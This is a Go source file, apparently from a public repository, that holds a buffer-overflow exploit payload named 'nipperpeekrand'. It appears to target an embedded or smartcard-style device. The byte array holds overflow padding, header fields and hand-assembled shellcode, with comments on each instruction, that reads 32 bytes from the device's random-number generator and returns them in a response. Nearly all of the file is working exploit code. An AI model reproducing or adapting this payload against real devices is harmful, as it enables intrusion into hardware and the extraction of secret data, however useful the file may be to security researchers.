-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathnipperpeekrand.go
75 lines (61 loc) · 2.22 KB
/
nipperpeekrand.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
package main
// This exploit returns 32 bytes from the RNG.
var nipperpeekrand = []byte{
/* Much of this is padding before the overflow. We could put
shellcode here, and the Headend exploit does, but we'll need
to clobber that buffer in sending our response.
*/
0x01, 0x02, 0x03, 0xa4, 0x05, 0x06, 0x07, 0x08,
0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x11, 0x02, 0x03, 0x04, 0x0a, 0x06, 0x07, 0x08,
0x59, 0x5A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0xc1, 0x02, 0x03, 0xd4, 0x05, 0x06, 0x07, 0xc8,
0x29, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x31, 0xd2, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08,
0x39, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x41, 0x02, 0x03, 0xd4, 0x05, 0x06, 0x07, 0x08,
0x49, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10,
0x51, 0x02, 0x03, 0x04, 0x05, 0x06, 0xe7, 0x08,
0x59, 0x0A, 0x0a, 0x0C, 0x0a, 0x0E, 0x0F, 0x10,
0x61, 0x02, 0x03, 0x04, 0x00, 0x01, 0x02, 0x03,
0x04, 0x05, 0x0b, 0x07, 0x08, 0x09, 0x0A, 0x0B,
0x0C, 0x0D, 0x0E, 0x0F, 0x00, 0xf1, 0x02, 0x03,
0x04, 0x05, 0xe6, 0x07, 0x08, 0x09, 0x0A, 0x0B,
0x0C, 0xfD, 0x0c, 0x0F,
//Early global variables at 0x220.
0x00, 0x01, 0x02, 0x03,
0x05, 0x0A, 0x06, 0x07,
0x08, 0x09, 0x0A, 0x0B,
0x0C, 0x0D, 0x0E, 0x0F,
// Flags
0x01, 0x01,
// 32: skip two bytes.
0x01, 0x00,
// NAD, PCB, LEN
0x00, 0x00, 0xFF,
// Six filler bytes.
0x07, 0x52, 0x56, 0x73, 0x03, 0xCD,
//3d: DC is total message length, C3 is the offset.
0xDC, 0x34, 0xC3,
//This is the entry point for our shellcode.
0x9d, //NOP
//Data begins at 0x19C+2.
0xAE, 0x21, //LD X, 0x20 ; Length field.
//loop:
0xB6, 0x06, //LD A, (target+1,X) //Load the high byte.
0xD7, 0x01, 0xA1, //STA (0x01A1+1,X) //Store the byte to the data buffer.
0x5A, //DEC X
0xB6, 0x07, //LD A, (target+1,X) //Load the low byte.
0xD7, 0x01, 0xA1, //STA (0x01A1+1,X) //Store the byte to the data buffer.
0x5A, //DEC X
0x2A, 0xF1, //JRPL loop ; F6
//Sends some data from the IO buffer.
0xa6, 0x93, //LDA #$93, response code
0xae, 0x40, //LDX #$17, length in data bytes
0xCD, 0x75, 0x7F, //JMP RESPONDAX to send the response.
0x9d,
//These three bytes will be clobbered. Don't rely on them.
0x00, 0x00, 0x00,
//These bytes set the entry point of 0x0060
0x00, 0x00, 0x00, 0x60,
}